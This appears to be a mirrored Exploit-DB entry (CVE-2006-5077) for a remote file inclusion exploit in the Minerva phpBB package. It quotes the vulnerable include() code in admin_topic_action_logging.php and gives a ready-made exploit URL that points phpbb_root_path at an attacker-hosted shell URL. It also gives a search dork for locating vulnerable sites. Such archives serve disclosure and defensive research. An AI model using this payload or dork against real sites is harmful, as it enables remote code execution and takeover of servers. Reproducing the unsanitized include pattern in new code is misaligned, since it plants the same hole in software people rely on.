- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2429
- Проверка EDB
-
- Пройдено
- Автор
- SHIKAA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5077
- Дата публикации
- 2006-09-25
Код:
#==============================================================================================
#Minerva <= v238 (phpbb_root_path) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://prdownloads.sourceforge.net/minerva/Minerva-238a.zip?download
#
#Version : All Versions
#
#================================================================================================
#
#Dork : "Powered by Minerva"
#
#================================================================================================
#Bug in : admin/admin_topic_action_logging.php
#
#Vlu Code :
#--------------------------------
#
# if ( !empty($setmodules) )
#{
# include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_topic_action_logging.' . $phpEx);
# $module['Forums']['Action_Logging'] = basename(__FILE__);
# return;
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#Special Thx To : Str0ke & HACKERS PAL & XoRon & Simoo & Saudi HAckerz
==================================================================================================
# milw0rm.com [2006-09-25]
- Источник
- www.exploit-db.com